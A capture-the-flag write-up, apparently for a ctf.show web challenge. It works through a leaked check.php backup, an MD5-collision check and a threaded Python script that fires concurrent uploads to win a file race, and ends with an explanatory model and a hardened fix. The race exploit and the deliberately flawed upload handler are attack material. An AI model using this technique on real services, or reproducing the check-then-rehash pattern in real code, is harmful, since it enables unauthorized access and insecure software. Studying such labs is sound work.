The hint says this is not SQL injection, so we need to find the source code. View the page source:
```html
<script>
function login(s){
    var u=document.getElementById("username").value;
    var p=document.getElementById("password").value;
    var xhr = new XMLHttpRequest();
    // Credentials go out as GET query parameters
    xhr.open('GET', "login.php?u="+u+"&p="+p);
    xhr.responseType = 'arraybuffer';
    xhr.onreadystatechange = function getPdfOnreadystatechange(e) {
        if (xhr.readyState === 4) {
            if (xhr.status === 200) {
                var data = (xhr.mozResponseArrayBuffer || xhr.mozResponse ||
                            xhr.responseArrayBuffer || xhr.response);
                if(data){
                    ctfshow(s,data);
                }
            }
        }
    };
    xhr.send(null);
}
function ctfshow(token,data){
    var oReq = new XMLHttpRequest();
    // The raw response body from login.php is POSTed on to check.php
    oReq.open("POST", "check.php?token="+token+"&php://input", true);
    oReq.onload = function (oEvent) {
        if(oReq.status===200){
            var res=eval("("+oReq.response+")");
            if(res.success ==1 &&res.error!=1){
                alert(res.msg);
                return;
            }
            if(res.error ==1){
                alert(res.errormsg);
                return;
            }
        }
        return;
    };
    oReq.send(data);
}
</script>
```
Note the request that the login flow builds: `oReq.open("POST", "check.php?token="+token+"&php://input", true);`

Set that aside for now and run a directory scanner against the site.

On Kali I used dirb, but its wordlist was probably not strong enough and it found nothing, so I went straight to 御剑 (Yujian), which found web.zip.

Download web.zip; inside is a file named check.php.bak:
```php
function receiveStreamFile($receiveFile){
    // Take the raw request body and write it to $receiveFile
    $streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
    if(empty($streamData)){
        $streamData = file_get_contents('php://input');
    }
    if($streamData!=''){
        $ret = file_put_contents($receiveFile, $streamData, true);
    }else{
        $ret = false;
    }
    return $ret;
}
// Token is just the MD5 of the current minute (date("i"))
if(md5(date("i")) === $token){
    $receiveFile = 'flag.dat';
    receiveStreamFile($receiveFile);
    // The uploaded file is hashed from disk twice: first MD5, then SHA-512
    if(md5_file($receiveFile)===md5_file("key.dat")){
        if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
            $ret['success']="1";
            $ret['msg']="人脸识别成功!$flag";
            $ret['error']="0";
            echo json_encode($ret);
            return;
        }
        $ret['errormsg']="same file";
        echo json_encode($ret);
        return;
    }
    $ret['errormsg']="md5 error";
    echo json_encode($ret);
    return;
}
$ret['errormsg']="token error";
echo json_encode($ret);
return;
```
So the check is a collision against key.dat: the uploaded file must have the same MD5 as key.dat while its SHA-512 differs (the code compares `md5_file` first, then `hash_file("sha512", ...)`).

key.dat can be downloaded directly from /key.dat.

Use the tool fastcoll_v1.0.0.5.exe to generate two files with the same MD5:

```
fastcoll_v1.0.0.5.exe -p key.dat -o 1.dat 2.dat
```

Then use the upload script to send 1.dat or 2.dat and trigger the collision:
```python
import hashlib
import threading
import time

import requests


def post(data):
    """Send one raw body to check.php and print the response if it contains the flag."""
    try:
        r = requests.post(url, data=data)
        if "ctfshow" in r.text:
            print(r.text)
    except Exception:
        pass


# The token is md5(date("i")): the current minute, zero-padded to two digits.
# date("i") runs on the server's clock, so the local clock must agree with it.
mi = time.strftime("%M")
m = hashlib.md5(mi.encode()).hexdigest()
url = 'http://b628580c-7c5d-479c-b607-44011837aaea.challenge.ctf.show/check.php?token={}&php://input'.format(m)

# key.dat passes the md5_file check; 2.dat is one of the fastcoll outputs.
with open('key.dat', 'rb') as f:
    data1 = f.read()
with open('2.dat', 'rb') as f:
    data2 = f.read()

# Fire 30 uploads of each body so the two different bodies are written to
# flag.dat by concurrent requests.
for i in range(30):
    threading.Thread(target=post, args=(data1,)).start()
for i in range(30):
    threading.Thread(target=post, args=(data2,)).start()
```
Run the script to get the flag.
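The script above sends key.dat and 2.dat concurrently, and check.php hashes flag.dat from disk twice after writing it. The following Python model is added here and is not part of the original writeup or of the challenge code: it reproduces the handler's decision logic to show why that ordering matters (the "success" branch is reached only when a second request's write lands between the `md5_file` and `hash_file` calls), shows a hardened variant that hashes the received bytes once so no such window exists, reproduces the minute-based token including the zero padding of `date("i")`, and includes a helper to confirm that two fastcoll outputs really share an MD5. All function names, the `SharedFile` class and the sample bytes are constructed for this example.

```python
import hashlib

# Constructed sample data for this example; not the challenge's real key.dat
# or a real fastcoll output.
KEY = b"constructed contents of key.dat\n"
OTHER = b"constructed second body that differs from key.dat\n"


def minute_token(minute):
    """Reproduce md5(date("i")): PHP's date("i") is the minute zero-padded to two digits."""
    return hashlib.md5(f"{minute:02d}".encode()).hexdigest()


class SharedFile:
    """Stand-in for flag.dat: one path that every request writes to and re-reads."""

    def __init__(self):
        self.data = b""

    def write(self, body):
        self.data = body

    def read(self):
        return self.data


def vulnerable_check(shared, body, key, interleaved_body=None):
    """Model of check.php after the token check.

    The handler writes the request body to flag.dat and then hashes the *file*
    twice. `interleaved_body`, if given, simulates a concurrent request whose
    write to the same path lands between the md5_file and hash_file calls.
    """
    shared.write(body)  # receiveStreamFile() -> file_put_contents('flag.dat', ...)
    if hashlib.md5(shared.read()).digest() != hashlib.md5(key).digest():  # md5_file compare
        return "md5 error"
    if interleaved_body is not None:
        shared.write(interleaved_body)  # another request rewrites flag.dat here
    if hashlib.sha512(shared.read()).digest() != hashlib.sha512(key).digest():  # hash_file sha512
        return "success"
    return "same file"


def hardened_check(body, key):
    """Same decision logic, but both hashes are taken over the bytes this
    request actually received, so no other request can change what is compared."""
    if hashlib.md5(body).digest() != hashlib.md5(key).digest():
        return "md5 error"
    if hashlib.sha512(body).digest() != hashlib.sha512(key).digest():
        return "success"
    return "same file"


def is_md5_collision_pair(a, b):
    """True when two byte strings differ but share an MD5 digest
    (the property to verify on fastcoll's two output files)."""
    return a != b and hashlib.md5(a).digest() == hashlib.md5(b).digest()


if __name__ == "__main__":
    # Sequential requests: the body must equal key.dat, which is then rejected.
    print(vulnerable_check(SharedFile(), KEY, KEY))    # same file
    print(vulnerable_check(SharedFile(), OTHER, KEY))  # md5 error
    # Interleaved write: key.dat passes md5_file, OTHER is what hash_file sees.
    print(vulnerable_check(SharedFile(), KEY, KEY, interleaved_body=OTHER))  # success
    # Hardened: hashing the received bytes once leaves no window.
    print(hardened_check(KEY, KEY))  # same file
    print(minute_token(5))
```

The hardened variant closes the window that the 60 concurrent uploads exercise; with a single body, the "success" branch requires a file that has key.dat's exact MD5 and different content, which is a second-preimage problem, not the two-new-files collision that fastcoll's identical-prefix construction produces.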